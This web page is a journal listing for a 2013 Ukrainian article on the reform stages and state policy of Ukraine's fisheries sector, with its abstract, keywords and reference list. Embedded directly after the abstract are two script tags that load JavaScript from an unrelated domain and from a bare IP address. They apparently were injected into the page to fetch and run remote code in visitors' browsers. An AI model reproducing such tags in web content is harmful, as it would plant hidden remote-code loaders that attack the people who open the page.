ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.24:658:639.2/.3
Управління та інформаційне забезпечення

Управління рибним господарством України: етапи реформування і сучасна державна політика / Яркіна Н. М. // Економіка АПК. - 2013. - № 11 - С. 85

Розглянуто етапи реформування рибного господарства України, дано оцінку ефективності державного управління рибною галуззю за 1991-2012 рр., подано зміст і сформульовано функції сучасної державної політики в сфері рибного господарства. Охарактеризовано нормативно-правову складову механізму управління підприємствами рибної галузі, проаналізовано попередній вітчизняний і зарубіжний досвід управління рибним господарством, відзначено необхідність централізованого планування та координації діяльності вертикально і горизонтально інтегрованих підприємств у рамках державного замовлення на рибну продукцію за допомогою формування галузевого об'єднання у формі концерну. Вказано на необхідність удосконалення системи квотування рибальства, а також активізації фінансової підтримки і стимулювання підприємницького інтересу суб'єктів рибогосподарської діяльності. Табл.: 1. Бібліогр.: 14.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: рибне господарство, реформування, державне управління, політика, елементи механізму управління, нормативно-правова база

Список використаних джерел

 1. Акулич О.В. Государственное регулирование рыбохозяйственной деятельности как фактор конкурентоспособности рыбной отрасли / О. В. Акулич // Рыбное хозяйство. – 2011. – № 4. – С. 15-18.
 2. Державна цільова економічна програма розвитку рибного господарства на 2012-2016 роки. Затверджено постановою Кабінету Міністрів України № 1245 від 23 листоп. 2011 р. [Електронний ресурс]. – Режим доступу: http://zakon4.rada.gov.ua/laws/show/1245-2011-п.
 3. Закон України «Про аквакультуру», № 5293-VI від 18.09.2012 р. [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/5293-17.
 4. Закон України «Про рибне господарство, промислове рибальство та охорону водних біоресурсів», № 3677-17 від 08.07.2011 р. [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/3677-17.
 5. Изотов С.В. Регулирование рыбного хозяйства за рубежом (мировой опыт, заслуживающий внимания в Украине) / С. В. Изотов // Рибне господарство України. – 2009. – № 4. – С. 74-79.
 6. Історія становлення / Державне агентство рибного господарства України [Електронний ресурс]. – Режим доступу : http://darg.gov.ua/_derzhribagentstvo_0_1_menu_0_1.html.
 7. Кавер И.К. Креативный императив рыбной отрасли: монография / И. К. Кавер, В. Г. Верходанов, С. В. Изотов. – Севастополь: Украинский морской институт, 2008. – 190 с.
 8. Налоговый кодекс Российской Федерации, № 146-ФЗ от 31.07.1998 г. (2013) [Электронный ресурс]. – Режим доступа : http://vladrieltor.ru/nalkodeks.
 9. Податковий кодекс України, № 2755-VI від 02.12.2010 (2013) [Електронний ресурс]. – Режим доступу : http://zakon4.rada.gov.ua/laws/show/2755-17.
 10. Рибне господарство / Державна служба статистики України (2013) [Електронний ресурс]. – Режим доступу : http://www.ukrstat.gov.ua/
 11. Стасишен М.С. Економіко-екологічні проблеми розвитку рибогосподарського комплексу України: теорія і практика : дис. доктора екон. наук : 08.00.06 / М. С. Стасишен ; Рада по вивченню продуктивних сил України НАН. – К., 2010. – 432 с.
 12. Федотенков Д. Интервью на сайте ukranews.com [Электронный ресурс]. – Режим доступа : http://ukranews.com/ru/interview/2010/06/02/139.
 13. Management of the fisheries. An introduction to the economics of fisheries management. / FAO Corporate Document Repository [Electronic recourse]. – Accessed mode : http://www.fao.org/docrep/003/T0506E/T0506E02.HTM
 14. Hishamunda N. Analysis of aquaculture development in Southeast Asia: a policy perspective / N. Hishamunda, P.B. Bueno, N. Ridler and W.G. Yap // FAO Fisheries and Aquaculture Technical Paper: Rome, FAO. – 2009. – № 509. – 69 p.
Читати статтю: 13_11_85-91.pdf